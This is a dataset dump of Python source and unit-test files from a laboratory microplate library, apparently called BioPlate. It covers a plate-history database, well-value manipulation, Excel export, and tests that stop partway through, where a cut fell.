metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "jecker7/BioPlate",
"score": 3
}
|
#### File: BioPlate/database/plate_historic_db.py
```python
import datetime
from sqlalchemy import Column, Integer, String, Date, PickleType
from sqlalchemy.ext.hybrid import hybrid_property
import BioPlate
from BioPlate.database.database import Database
class PlateHist(Database):
class PlateHistoric(Database.Base):
"""
historic of create plate
"""
__tablename__ = "plate_historic"
__table_args__ = {"useexisting": True}
id = Column(Integer, primary_key=True)
Plate_id = Column(Integer)
numWell = Column(Integer, nullable=False)
date = Column(Date, nullable=False)
plate_name = Column(String(250), unique=True, nullable=False)
plate_array = Column(PickleType, nullable=False)
@hybrid_property
def plate(self):
if isinstance(self.plate_array, list):
return BioPlate.stack.Stack(self.plate_array)
else:
return self.plate_array
def __str__(self):
return (
"<plate N°"
+ str(self.id)
+ ": "
+ self.plate_name
+ ", "
+ str(self.numWell)
+ " wells, "
+ str(self.date)
+ ">"
)
def __repr__(self):
return (
"<plate N°"
+ str(self.id)
+ ": "
+ self.plate_name
+ ", "
+ str(self.numWell)
+ " wells, "
+ str(self.date)
+ ">"
)
def __init__(self, db_name="plate_historic.db"):
self.db_name = db_name
super().__init__(self.PlateHistoric, db_name)
def add_hplate(self, numWell, plate_name, plate_array, Plate_id=None):
"""
:param Plate_id: id of plate in plate.db
:param numWell: int, number of well in plate
:param date: date where plate was creating
:param plate_name: name of experiment or plate
:param plate_array: numpy array representation of the plate
:return:
"""
already_exist = self.session.query(self.database_class).filter_by(
Plate_id=Plate_id,
numWell=numWell,
date=self.date_now,
plate_name=plate_name,
)
if not already_exist.count():
new_entry = self.database_class(
Plate_id=Plate_id,
numWell=numWell,
date=self.date_now,
plate_name=plate_name,
plate_array=plate_array,
)
self.session.add(new_entry)
self.session.commit()
self.session.close()
Type = type(plate_array).__name__
Type = "Stack" if Type == "list" else Type
return f"{Type} {plate_name} with {numWell} wells was successfully added to database {self.db_name}"
else:
return already_exist[0].id
def update_hplate(self, dict_update, args, key="numWell"):
return super().update(dict_update, args, key=key)
def delete_hplate(self, args, key="numWell"):
return super().delete(args, key=key)
def get_one_hplate(self, args, key="numWell"):
return super().get_one(args, key=key)
def get_hplate(self, **kwargs):
return super().get(**kwargs)
def get_all_hplate(self):
return super().get_all()
@property
def date_now(self):
date = datetime.datetime.now()
return datetime.date(date.year, date.month, date.day)
```
#### File: BioPlate/BioPlate/manipulation.py
```python
from typing import (
Dict,
List,
Tuple,
Optional,
Union,
Any,
overload,
Sequence,
Generator,
)
from collections.abc import Iterable
import numpy as np
import numpy.core.defchararray as ncd
from tabulate import tabulate
from BioPlate.count import BioPlateCount
from BioPlate.database.plate_historic_db import PlateHist
from BioPlate.iterate import BioPlateIterate
from BioPlate.matrix import BioPlateMatrix
class BioPlateManipulation:
"""This parent class grouped all method that can be applied to BioPlate instance.
"""
def __getitem__(self, index): #pragma: no cover
return self[index]
def __setitem__(self, index, value):#pragma: no cover
self[index] = value
@property
def name(self: "BioPlateManipulation") -> str:
"""
Get object name (BioPlate, Inserts, Array)
Returns
-------
name : str
name of instance
Examples
---------
>>> from BioPlate import BioPlate
>>> plate = BioPlate(12, 8)
>>> plate.name
BioPlate
"""
return type(self).__name__
@overload
def _args_analyse(
self: "BioPlateManipulation", well: Dict[str, Any], value: None
) -> Tuple[Dict[str, Any], None]: # pragma: no cover
pass
@overload
def _args_analyse(
self: "BioPlateManipulation", well: Dict[str, Any]
) -> Tuple[Dict[str, Any], None]: # pragma: no cover
pass
@overload
def _args_analyse(
self: "BioPlateManipulation",
well: str,
value: List[Any],
) -> Tuple[str, Union[str, int, float, List[Any], None]]: # pragma: no cover
pass
@overload
def _args_analyse(
self: "BioPlateManipulation",
well: str,
value: Union[str, int, float, List[Any], None],
) -> Tuple[str, Union[str, int, float, List[Any], None]]: # pragma: no cover
pass
def _args_analyse(self, *args):
"""
Parameters
----------
well : dict or str
stand alone args with value for each well
value : list or str or int or float
list of value or value alone
Returns
-------
well : dict or str
well position
value : list or str or int or float or None
value for given well, None if dict was pass as argument
Examples
----------
>>> BioPlateManipulation._args_analyse({"A1" : "test"})
({"A1" : "test"}, None)
>>> BioPlateManipulation._args_analyse("A[1-2]", ["test", "test1"])
("A[1-2]", ["test", "test1"])
"""
if len(args) == 1:
well, *trash = args
value = None
return well, value
if len(args) == 2:
well, value, *trash = args
return well, value
@overload
def set(
self: "BioPlateManipulation", well: Dict[str, Any], value: None
) -> Union["BioPlateManipulation", str]: # pragma: no cover
pass
@overload
def set(
self: "BioPlateManipulation", well: Dict[str, Any]
) -> Union["BioPlateManipulation", str]: # pragma: no cover
pass
@overload
def set(
self: "BioPlateManipulation",
well: str,
value: Union[str, int, float, List[Any], None],
) -> Union["BioPlateManipulation", str]: # pragma: no cover
pass
def set(self, *args, merge=False):
"""Main entry point to assign value on plate
Parameters
----------
well : dict or str
- if dict, well must contain well identifier as key and value to assign as value.eg : {"A2" : "value", "A[3-6]" : 42}
- if string, well is only a well identifier eg : "G5"
value : list or str or int or float
- if list, value should be presented with multiple well identifer "B-D[2-5]", ["value1", "value2", "value3"]
merge : bool (by default False)
Value on well are not overide but added
Returns
-------
BioPlate : BioPlate
return instance of plate
Exemples
--------
see :ref:`Set-values-on-plate`
"""
well, value = self._args_analyse(*args)
if not isinstance(well, str) and isinstance(well, Iterable):
generator = well.items() if isinstance(well, dict) else well
for key, val in generator:
if merge:
self.set(key, val, merge=True)
else:
self.set(key, val)
return self
well = BioPlateMatrix(str(well))
if isinstance(value, list):
plate_shape = self[well.row, well.column].shape
len_plate_shape = len(plate_shape)
if len_plate_shape > 1:
if well.pos == "R":
resh_val = np.reshape(value, (plate_shape[0], 1))
else:
resh_val = value
if merge:
self[well.row, well.column] = ncd.add(
self[well.row, well.column], resh_val
)
return self
self[well.row, well.column] = resh_val
return self
else:
if merge:
self[well.row, well.column][: len(value)] = ncd.add(
self[well.row, well.column][: len(value)], value
)
return self
self[well.row, well.column][: len(value)] = value
return self
if merge:
self[well.row, well.column] = ncd.add(self[well.row, well.column], value)
return self
self[well.row, well.column] = value
return self
def get(
self: "BioPlateManipulation", *well: str
) -> Union[List[str], Optional["BioPlateManipulation"], List[Sequence[Any]]]:
"""
Use to retrive informations from BioPlate instance
Parameters
----------
well : str
well is only a well identifier eg : "G5", "2[B-G]"
Returns
-------
One_well : str
get back value in one well eg : "G5"
multiple_well : np.array
get back all value eg : "2[B-G]"
multiple_well_multiple_identifier : list
return a list of eqch given arguments
"""
if len(well) > 1:
querry = list()
for w in well:
result = self[w]
if isinstance(result, str):
querry.append(result)
else:
querry.append(result.tolist())
return querry
else:
return self[str(well[0])]
def save(self: "BioPlateManipulation", plate_name: str, **kwargs) -> Optional[str]:
"""
Save BioPlate objwct to plate history database
Parameters
----------
plate_name : str
name of plate to save it in database eg : "expetiment 1"
kwargs : dict
To know kwargs see :func:`~BioPlate.database.plate_historic_db.PlateHist.add_hplate`
Returns
-------
response : str
database response for adding or updating plate historic database
"""
dbName = kwargs.get("db_hist_name")
if not dbName:
phi = PlateHist()
else:
phi = PlateHist(db_name=dbName)
well = next(BioPlateIterate(self, OnlyValue=True)).shape
numWell = well[0] * well[1]
response = phi.add_hplate(numWell, plate_name, self)
if isinstance(response, str):
return response
else:
dict_update = {"plate_name": plate_name, "plate_array": self}
return phi.update_hplate(dict_update, response, key="id")
def table(
self: "BioPlateManipulation", headers: str = "firstrow", **kwargs
) -> tabulate:
"""
Transform BioPlate object to table
Parameters
----------
headers : str (by default "firstrow")
kwargs : dict
To know kwargs see `Tabulate <https://pypi.org/project/tabulate/#description>`_
Returns
-------
table : str
outputs a nicely formatted plain-text table
"""
return tabulate(self, headers=headers, **kwargs)
def iterate(
self: "BioPlateManipulation", order: str = "C", accumulate: bool = True
) -> Generator:
"""
Generaror to Iterate a BioPlate instance by column or row, with ability to group value of same well
Parameters
----------
order : { 'C', 'R'}
Iterate by column (C) or by row (R)
accumulate : bool (by default True)
Group data of same well together
Yields
-------
well : tuple
each iteration contain well identifier and value(s) eg : ("B2", "value")
"""
yield from BioPlateIterate(self, order=order, accumulate=accumulate)
def count(self: "BioPlateManipulation", reverse: bool = False):
"""
Count number of occurance in BioPlate instance
Parameters
----------
reverse : bool (by default false)
Returns
-------
result : dict
return a dict of occurance name : number of occurance
"""
return BioPlateCount(self, reverse=reverse)
def to_excel(
self: "BioPlateManipulation",
file_name: str,
sheets: List[str] = ["plate_representation", "plate_data", "plate_count"],
header: bool = True,
accumulate: bool = True,
order: str = "C",
empty: str = "empty",
):
"""
Send BioPlate instance to spreadsheet
Parameters
----------
file_name : str
name of new created spreadsheet
sheets : list[str]
name of sheets
header : bool (default is True)
if header should be present in plate representation
accumulate : bool (default is True)
If data in BioPlate object should be accumulate or not see :func:`~BioPlate.Manipulation.BioPlateManipulation.iterate`
order : {"C", "R"}
Iterate value by column or row
empty : str
value assign to empty well
Returns
-------
spreadsheet : None
create a spreasheet at given filename (should contain path also)
"""
from BioPlate.writer.to_excel import BioPlateToExcel
xls_file = BioPlateToExcel(
file_name,
sheets=sheets,
header=header,
accumulate=accumulate,
order=order,
empty=empty,
test=False,
)
xls_file.representation(self)
xls_file.data(self)
xls_file.count(self)
xls_file.close()
```
#### File: BioPlate/writer/to_excel.py
```python
from io import BytesIO
import xlsxwriter
from BioPlate import BioPlate
from BioPlate.inserts import Inserts
from BioPlate.stack import Stack
from BioPlate.plate import Plate
class BioPlateToExcel:
"""Past BioPlate object to excel file.
"""
def __init__(
self,
file_name,
sheets=["plate_representation", "plate_data", "plate_count"],
header=True,
accumulate=True,
order="C",
empty="empty",
test=False,
):
"""This class is instentiate with parameters for excel file. BioPlate object are only pass to method.
Parameters
----------------
file_name: str
name of excel file
sheets: List[str]
list of sheetname (default is ["plate_representation", "plate_data", "plate_count"])
header: bool
if header should be put
accumulate: bool
if plate data should be accumulate for same well or listed
order: str, {"R", "C"}
if iteration should be done by column or row
empty: str
Name of well without value
test : bool
For testing purpose, return in memory object
"""
self.fileName = file_name
self.sheets = sheets
self.last_row_representation = 0
self.test = test
self.output = BytesIO() if test else None
self.header = header
self.accumulate = accumulate
self.order = order
self.empty = empty
try:
self.workbook = self.open_excel_file
self.plate_rep, self.plate_data, self.plate_count = self.select_worksheet
self.hd_format_representation = self.workbook.add_format(
{"bold": True, "align": "center", "valign": "vcenter"}
)
self.hd_format_inserts = self.workbook.add_format(
{
"bold": True,
"font_color": "red",
"align": "center",
"valign": "vcenter",
}
)
except Exception as e:
raise e
@property
def open_excel_file(self):
"""Create a ``xlsxwriter Workbook`` to work with. If test is ``True`` when class is instenciate this function will return a in `memory Workbook`_.
.. _memory Workbook: https://xlsxwriter.readthedocs.io/workbook.html
.. _`xlsxwriter.Workbook`: https://xlsxwriter.readthedocs.io/workbook.html
Returns
-----------
Workbook : `xlsxwriter.Workbook`_
An object to write excel file
"""
if self.test:
return xlsxwriter.Workbook(self.output, {"in_memory": True})
return xlsxwriter.Workbook(self.fileName)
@property
def select_worksheet(self):
"""Create worksheets object for each sheets given.
Returns
-----------
worksheets : List[xlsxwriter.worksheets]
Return a list of `worksheets`_
.. _worksheets: https://xlsxwriter.readthedocs.io/worksheet.html#worksheet
"""
worksheets = list()
for sheet in self.sheets:
ws = self.workbook.add_worksheet(sheet)
worksheets.append(ws)
return worksheets
def close(self):
"""Close workbook properly
"""
self.workbook.close()
def get_test(self):
"""Return list of value stocked in memory of workbook.
Returns
---------
values : Dict[str, List[List]]
returns values passed to workbook as dict with sheetnames as key and value as list of values.
"""
try:
return self.output.getvalue()
except AttributeError:
return None
def __header_format_representation(self, format):
"""Function to pass heqdwr format representation to workbook object
Parameters
---------------
format : Dict
Dict of format to apply to plate header following xlswriter rules
"""
self.plate_rep.set_row(self.last_row_representation, None, format)
self.plate_rep.set_column(0, 0, None, format)
def representation(self, BPlate):
"""This function put reprenstation of BPlate depending on is type (Plate, Inserts, Stack)
Parameters
--------------
BPlate : BioPlate
BioPlate object to represent in spreqdsheets
"""
if isinstance(BPlate, Plate):
self._representation(BPlate)
elif isinstance(BPlate, Stack):
for plate in BPlate:
if isinstance(plate, Plate):
self._representation(plate)
elif isinstance(plate, Inserts):
self._representation_inserts(plate)
elif isinstance(BPlate, Inserts):
self._representation_inserts(BPlate)
def _representation(self, plate):
"""Pass Plate representation to spreadsheet
Parameters
--------------
plate : Plate
Plate object to represent
"""
self.__header_format_representation( self.hd_format_representation)
plate = self.plate_split(plate)
for row, value in enumerate(plate, self.last_row_representation):
self.plate_rep.write_row(row, 0, value)
self.last_row_representation += len(plate) + 1
def _representation_inserts(self, BPlate):
"""Pass Inserts representation to spreadsheet
Parameters
--------------
BPlate : Inserts
Inserts object to represent
"""
position = ["TOP", "BOT"]
for pos, plate_part in zip(position, BPlate):
rm = self.last_row_representation
self._representation(plate_part)
if self.header:
self.plate_rep.write(rm, 0, pos, self.hd_format_inserts)
def plate_split(self, plate):
"""
Remove row and column
"""
if self.header:
return plate
else:
return plate[1:, 1:]
def data(self, BPlate, accumulate=None, order=None, header=None):
"""
add to worksheet plate data, well and their value in column, ordered by column or row. If accumulated, well will be writen once.
header should be a list of column name
"""
order = self.order if order is None else order
accumulate = self.accumulate if accumulate is None else accumulate
if isinstance(BPlate, Inserts) or isinstance(
BPlate[0], Inserts
):
self._data(
BPlate, accumulate=accumulate, order=order, inserts=True, header=header
)
else:
self._data(BPlate, accumulate=accumulate, order=order, header=header)
def _data(self, BPlate, accumulate=True, order="C", header=None, inserts=False):
for row, value in enumerate(
BPlate.iterate(accumulate=accumulate, order=order), 1
):
self.plate_data.write_row(row, 0, value)
len_column = len(value) - 1
if not inserts:
hd = self.__header_data_BP(len_column, accumulate=accumulate)
else:
hd = self.__header_data_Inserts(len_column, accumulate=accumulate)
head = hd if header is None else header
self.plate_data.write_row(0, 0, head)
def __header_data_BP(self, len_column, accumulate=True):
hd = ["well"]
Add = lambda n: "value" + str(n) if accumulate else "value"
header = list(map(Add, range(len_column)))
hd = hd + header
return hd
def __header_data_Inserts(self, len_column, accumulate=True):
len_column = len_column // 2
hd = ["well"]
if accumulate:
header = []
for n in range(len_column):
header += ["top" + str(n), "bot" + str(n)]
else:
header = ["top", "bot"]
hd = hd + header
return hd
def count(self, BPlate):
self._count(BPlate)
def _count(self, BPlate):
for row, V in self.__count(BPlate):
self.plate_count.write_row(row, 0, V)
self._header_count(len(V), Inserts=isinstance(BPlate, Inserts))
def __count(self, BPlate):
row = 0
for keys, values in BPlate.count().items():
if not isinstance(values, dict):
keys = keys if keys != "" else self.empty
V = [keys, values]
row += 1
yield row, V
else:
for key, value in values.items():
if not isinstance(value, dict):
key = key if key != "" else self.empty
V = [keys, key, value]
row += 1
yield row, V
else:
for k, v in value.items():
k = k if k != "" else self.empty
V = [keys, key, k, v]
row += 1
yield row, V
def _header_count(self, len_header, Inserts=False):
if len_header == 2:
hd = ["infos", "count"]
elif len_header == 3:
if not Inserts:
hd = ["plate", "infos", "count"]
else:
hd = ["position", "infos", "count"]
elif len_header == 4:
hd = ["plate", "position", "infos", "count"]
self.plate_count.write_row(0, 0, hd)
```
#### File: BioPlate/tests/test_manipulation.py
```python
import unittest
from BioPlate.manipulation import BioPlateManipulation
class TestBioPlateManipulation(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""
This function is run one time at the beginning of tests
:return:
"""
pass
@classmethod
def tearDownClass(cls):
"""
This function is run one time at the end of tests
:return:
"""
pass
def setUp(self):
"""
This function is run every time at the beginning of each test
:return:
"""
self.BPM = BioPlateManipulation()
def tearDown(self):
"""
This function is run every time at the end of each test
:return:
"""
pass
# def test_add_values(self):
# self.assertEqual(
# self.BPM._add_values({"A": {3: 5}}), "{'A': {3: 5}} have a wrong format"
# )
def test_args_analysis(self):
self.assertEqual(self.BPM._args_analyse(12, ["bob1", "bob2"]), (12, ["bob1", "bob2"]))
self.assertEqual(self.BPM._args_analyse({"test" : 12}), ({"test" : 12}, None))
self.assertEqual( self.BPM._args_analyse("A[2-3]", ["Bob", "Marc"]), ("A[2-3]", ["Bob", "Marc"]))
if __name__ == "__main__":
unittest.main()
```
#### File: BioPlate/tests/test_plate_historic_db.py
```python
import unittest
from BioPlate.database.plate_historic_db import PlateHist
from BioPlate.database.plate_db import PlateDB
from BioPlate import BioPlate
from pathlib import Path, PurePath
import contextlib
import numpy as np
import datetime
class TestPlateDB(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""
This function is run one time at the beginning of tests
:return:
"""
cls.pdb = PlateDB(db_name="test_plate.db")
cls.pdb.add_plate(
numWell=96,
numColumns=12,
numRows=8,
surfWell=0.29,
maxVolWell=200,
workVolWell=200,
refURL="https://csmedia2.corning.com/LifeSciences/Media/pdf/cc_surface_areas.pdf",
)
v = {
"A[2,8]": "VC",
"H[2,8]": "MS",
"1-4[B,G]": ["MLR", "NT", "1.1", "1.2"],
"E-G[8,10]": ["Val1", "Val2", "Val3"],
}
cls.plt = BioPlate({"id": 1}, db_name="test_plate.db")
cls.plt.set(v)
cls.phi = PlateHist(db_name="test_plate_historic.db")
cls.phi.add_hplate(
Plate_id=1,
numWell=96,
plate_name="First plate to test",
plate_array=cls.plt,
)
dt = datetime.datetime.now()
cls.date = datetime.date(dt.year, dt.month, dt.day)
@classmethod
def tearDownClass(cls):
"""
This function is run one time at the end of tests
:return:
"""
with contextlib.suppress(FileNotFoundError):
Path(
PurePath(
Path(__file__).parent.parent,
"BioPlate/database/DBFiles",
"test_plate.db",
)
).unlink()
Path(
PurePath(
Path(__file__).parent.parent,
"BioPlate/database/DBFiles",
"test_plate_historic.db",
)
).unlink()
def setUp(self):
"""
This function is run every time at the beginning of each test
:return:
"""
self.plate_list = self.phi.get_hplate(numWell=96)
self.plate = self.plate_list[0]
def tearDown(self):
"""
This function is run every time at the end of each test
:return:
"""
pass
def test_get_hplate(self):
self.assertIsInstance(
self.plate_list, list, "plate_db.get_plate don't return a list"
)
self.assertEqual(
f"<plate N°1: First plate to test, 96 wells, {self.phi.date_now}>",
str(self.plate),
"plate_db.get_plate don't return the appropriate format",
)
self.assertTrue(
str(type(self.plate))
== "<class 'BioPlate.database.plate_historic_db.PlateHist.PlateHistoric'>",
f"plate_db.get_plate don't return the right class : {str(type(self.plate))}",
)
def test_plate_class(self):
self.assertEqual(self.plate.numWell, 96, "Error numWell association fail")
self.assertEqual(
self.plate.plate_name,
"First plate to test",
"Error numColumns association fail",
)
np.testing.assert_array_equal(self.plate.plate_array, self.plt)
def test_add_hplate(self):
add_plate_1 = self.pdb.add_plate(
numWell=6,
numColumns=3,
numRows=2,
surfWell=9.5,
maxVolWell=2000,
workVolWell=2000,
refURL="https://csmedia2.corning.com/LifeSciences/Media/pdf/cc_surface_areas.pdf",
)
p6 = self.pdb.get_one_plate(6)
Plate6 = BioPlate({"numWell": 6}, db_name="test_plate.db")
add_hplate_1 = self.phi.add_hplate(
Plate_id=2, numWell=6, plate_name="second plate", plate_array=Plate6
)
add_hplate_2 = self.phi.add_hplate(
Plate_id=2, numWell=6, plate_name="second plate", plate_array=Plate6
)
self.assertEqual(
add_hplate_1,
"Plate second plate with 6 wells was successfully added to database test_plate_historic.db",
)
self.assertEqual(add_hplate_2, 2)
self.assertEqual(
f"<plate N°2: second plate, 6 wells, {self.phi.date_now}>",
str(self.phi.get_one_hplate(6)),
)
self.assertEqual(6, self.phi.get_hplate(numWell=6)[0].numWell)
def test_delete_hplate(self):
self.assertEqual(self.phi.delete_hplate(6), "plate with 6 numWell deleted")
self.assertEqual(self.phi.get_hplate(numWell=6), [])
def test_repr(self):
Pl = self.phi.get_one(1, key="id")
self.assertEqual(repr(Pl), f"<plate N°1: First plate to test, 96 wells, {self.date}>")
def test_get_all(self):
self.assertEqual(str(self.phi.get_all_hplate()), f"[<plate N°1: First plate to test, 96 wells, {self.date}>]")
def test_stack(self):
pl1 = BioPlate(12, 8)
pl2 = BioPlate(12, 8)
pl1.set("A2", "bob")
self.phi.add_hplate(
Plate_id=2, numWell=96, plate_name="stack", plate_array=[pl1, pl2]
)
Pl = self.phi.get_one(2, key="id").plate
self.assertEqual(Pl.name, "Stack")
self.assertEqual(Pl.get(0, "A2"), "bob")
if __name__ == "__main__":
unittest.main()
```
#### File: BioPlate/tests/test_plate_to_excel.py
```python
import unittest
import contextlib
import numpy as np
from pathlib import Path, PurePath
from pyexcel_xlsx import get_data
from BioPlate import BioPlate
from BioPlate.writer.to_excel import BioPlateToExcel
from BioPlate.database.plate_db import PlateDB
from BioPlate.database.plate_historic_db import PlateHist
from string import ascii_uppercase
from tabulate import tabulate
def remove_tail(liste):
lis = liste[::-1]
for i, val in enumerate(lis):
if not val:
del lis[i]
liste = lis[::-1]
return remove_tail(liste)
else:
return liste
def remove_np_tail(liste):
lis = liste[::-1]
isempty = np.vectorize(any)
for i, val in enumerate(lis):
if val.any():
del lis[i]
liste = lis[::-1]
return remove_np_tail(liste)
else:
return liste
def like_read_excel(plate, header=True, lst=None):
rm_empty = [] if lst is None else lst
if plate.name == "Plate":
return clean_list(rm_empty, plate, header=header)
elif plate.name == "Inserts":
n = 0
for parts in plate:
parts = parts if header else parts[1:, 1:]
u = len(parts)
for part in parts:
if header:
if n == 0:
part[0] = "TOP"
elif u == n:
part[0] = "BOT"
if u == n:
rm_empty.append([])
clean_list(rm_empty, part, parts=True)
n += 1
return rm_empty
def like_read_excel_stack(stack, header=True):
ll = None
for plate in stack:
if ll is None:
ll = like_read_excel(plate, header=header, lst=None)
else:
ll = like_read_excel(plate, header=header, lst=ll)
ll.append([])
del ll[-1]
return ll
def clean_list(li, plate, parts=False, header=True):
if not parts:
plate = plate if header else plate[1:, 1:]
for x in plate:
li.append(remove_tail(list(x)))
else:
li.append(remove_tail(list(plate)))
return li
def as_read_excel(PTE, action, plate, filename, sheetname, conditions=None):
if conditions:
for attr, value in conditions.items():
setattr(PTE, attr, value)
getattr(PTE, action)(plate)
getattr(PTE, "close")()
return get_data(filename)[sheetname]
def like_read_data(plate, accumulate=True, order="C", header=None, stack=False):
rm_empty = list(
map(list, getattr(plate, "iterate")(accumulate=accumulate, order=order))
)
if header is not None:
pass
else:
val = len(rm_empty[0])
if plate.name == "Plate":
header = ["well", "value0"]
elif plate.name == "Inserts":
if accumulate:
header = ["well", "top0", "bot0"]
else:
header = ["well", "top", "bot"]
if val <= 2:
pass
else:
if plate.name == "Inserts":
pass
# if val <= 3:
# for i in range(1, val):
# header.append('top' + str(i))
# header.append('bot' + str(i))
elif plate.name == "BioPlate":
for i in range(1, val):
header.append("value" + str(i))
if not stack:
rm_empty.insert(0, header)
return list(map(remove_tail, rm_empty))
def like_read_data_stack(stack, accumulate=True, order="C", header=None):
if stack[0].name == "Plate":
if accumulate:
header = ["well", "value0"]
else:
header = ["well", "value"]
elif stack[0].name == "Inserts":
if accumulate:
header = ["well", "top0", "bot0"]
else:
header = ["well", "top", "bot"]
if accumulate:
for i in range(1, len(stack)):
if stack[0].name == "Inserts":
header.append("top" + str(i))
header.append("bot" + str(i))
else:
header.append("value" + str(i))
rm_empty = list(
map(list, getattr(stack, "iterate")(accumulate=accumulate, order=order))
)
rm_empty.insert(0, header)
return list(map(remove_tail, rm_empty))
def like_read_count(plate, empty="empty", Inserts=False):
val = list(plate.count().items())
if isinstance(val[0][1], dict):
nv = []
for pos, valdict in val:
valdict = list(map(list, valdict.items()))
addp = lambda x: [pos] + x
nv += list(map(addp, valdict))
val = nv
if isinstance(val[0][2], dict):
nv = []
for i in range(len(val)):
num, pos, valdict = val[i]
valdict = list(map(list, valdict.items()))
addp = lambda x: [num, pos] + x
nv += list(map(addp, valdict))
val = nv
val = list(map(list, val))
change = lambda x: empty if x == "" else x
val = list(map(lambda y: list(map(change, y)), val))
len_header = len(val[0])
if len_header == 2:
hd = ["infos", "count"]
elif len_header == 3:
if not Inserts:
hd = ["plate", "infos", "count"]
else:
hd = ["position", "infos", "count"]
elif len_header == 4:
hd = ["plate", "position", "infos", "count"]
val.insert(0, hd)
return val
def nested_dict_to_list(dd):
local_list = []
for key, value in dd.items():
local_list.append(key)
local_list.extend(nested_dict_to_list(value))
return local_list
class TestPlateToExcel(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""
This function is run one time at the beginning of tests
:return:
"""
cls.pdb = PlateDB(db_name="test_plate.db")
cls.pdb.add_plate(
numWell=96,
numColumns=12,
numRows=8,
surfWell=0.29,
maxVolWell=200,
workVolWell=200,
refURL="https://csmedia2.corning.com/LifeSciences/Media/pdf/cc_surface_areas.pdf",
)
@classmethod
def tearDownClass(cls):
"""
This function is run one time at the end of tests
:return:
"""
with contextlib.suppress(FileNotFoundError):
Path(
PurePath(
Path(__file__).parent.parent
/ "BioPlate/database/DBFiles"
/ "test_plate.db"
)
).unlink()
Path(
PurePath(
Path(__file__).parent.parent
/ "BioPlate/database/DBFiles"
/ "test_plate_historic.db"
)
).unlink()
Path(
PurePath(
Path(__file__).parent.parent
/ "BioPlate/database/DBFiles"
/ "test_plate_to_excel.xlsx"
)
).unlink()
def setUp(self):
"""
This function is run every time at the beginning of each test
:return:
"""
self.PTE = BioPlateToExcel("test.xlsx")
v = {
"A[2,8]": "VC",
"H[2,8]": "MS",
"1-4[B,G]": ["MLR", "NT", "1.1", "1.2"],
"E-G[8,10]": ["Val1", "Val2", "Val3"],
}
v1 = {
"A[2,8]": "VC1",
"H[2,8]": "MS1",
"1-4[B,G]": ["MLR1", "NT1", "1.3", "1.4"],
"E-G[8,10]": ["Val4", "Val5", "Val6"],
}
v2 = {
"A[2,8]": "Top",
"H[2,8]": "MS",
"1-4[B,G]": ["MLR", "NT", "1.1", "1.2"],
"E-G[8,10]": ["Val1", "Val2", "Val3"],
}
v3 = {
"A[2,8]": "Bot",
"H[2,8]": "MS1",
"1-4[B,G]": ["MLR1", "NT1", "1.3", "1.4"],
"E-G[8,10]": ["Val4", "Val5", "Val6"],
}
self.plt = BioPlate({"id": 1}, db_name="test_plate.db")
self.plt.set(v)
self.plt1 = BioPlate(12, 8)
self.plt1.set(v1)
self.stack = self.plt + self.plt1
self.Inserts = BioPlate(12, 8, inserts=True)
self.Inserts.top.set(v)
self.Inserts.bot.set(v3)
self.Inserts1 = BioPlate(12, 8, inserts=True)
self.Inserts1.bot.set(v1)
self.Inserts1.top.set(v2)
self.stacki = self.Inserts + self.Inserts1
def tearDown(self):
"""
This function is run every time at the end of each test
:return:
"""
with contextlib.suppress(FileNotFoundError):
Path(PurePath("test.xlsx")).unlink()
###TEST DATA SHEET
def test_representation_BioPlate(self):
read_excel = as_read_excel(
self.PTE, "representation", self.plt, "test.xlsx", "plate_representation"
)
rm_empty = like_read_excel(self.plt)
self.assertEqual(read_excel, rm_empty)
def test_representation_BioPlate_hd(self):
c = {"header": False}
read_excel = as_read_excel(
self.PTE,
"representation",
self.plt,
"test.xlsx",
"plate_representation",
conditions=c,
)
rm_empty = like_read_excel(self.plt, header=False)
self.assertEqual(read_excel, rm_empty)
def test_representation_BioPlateInserts(self):
read_excel = as_read_excel(
self.PTE,
"representation",
self.Inserts,
"test.xlsx",
"plate_representation",
)
rm_empty = like_read_excel(self.Inserts)
self.assertEqual(read_excel, rm_empty)
def test_representation_BioPlateInserts_hd(self):
c = {"header": False}
read_excel = as_read_excel(
self.PTE,
"representation",
self.Inserts,
"test.xlsx",
"plate_representation",
conditions=c,
)
rm_empty = like_read_excel(self.Inserts, header=False)
self.assertEqual(read_excel, rm_empty)
def test_representation_BioPlateStack_bp(self):
read_excel = as_read_excel(
self.PTE, "representation", self.stack, "test.xlsx", "plate_representation"
)
rm_empty = like_read_excel_stack(self.stack)
self.assertEqual(read_excel, rm_empty)
def test_representation_BioPlateStack_bp_hd(self):
c = {"header": False}
read_excel = as_read_excel(
self.PTE,
"representation",
self.stack,
"test.xlsx",
"plate_representation",
conditions=c,
)
rm_empty = like_read_excel_stack(self.stack, header=False)
self.assertEqual(read_excel, rm_empty)
def test_representation_BioPlateStack_bpi(self):
read_excel = as_read_excel(
self.PTE, "representation", self.stacki, "test.xlsx", "plate_representation"
)
rm_empty = like_read_excel_stack(self.stacki)
self.assertEqual(read_excel, rm_empty)
def test_representation_BioPlateStack_bpi_hd(self):
c = {"header": False}
read_excel = as_read_excel(
self.PTE,
"representation",
self.stacki,
"test.xlsx",
"plate_representation",
conditions=c,
)
rm_empty = like_read_excel_stack(self.stacki, header=False)
self.assertEqual(read_excel, rm_empty)
###TEST DATA SHEET
def test_data_BioPlate(self):
c = None
read_excel = as_read_excel(
self.PTE, "data", self.plt, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data(self.plt)
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlate_row(self):
c = {"order": "R"}
read_excel = as_read_excel(
self.PTE, "data", self.plt, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data(self.plt, order="R")
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlateInserts(self):
c = None
read_excel = as_read_excel(
self.PTE, "data", self.Inserts, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data(self.Inserts)
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlateInserts_row(self):
c = {"order": "R"}
read_excel = as_read_excel(
self.PTE, "data", self.Inserts, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data(self.Inserts, order="R")
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlateInserts_row_acc(self):
c = {"order": "R", "accumulate": False}
read_excel = as_read_excel(
self.PTE, "data", self.Inserts, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data(self.Inserts, order="R", accumulate=False)
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlateStack_bp(self):
c = None
read_excel = as_read_excel(
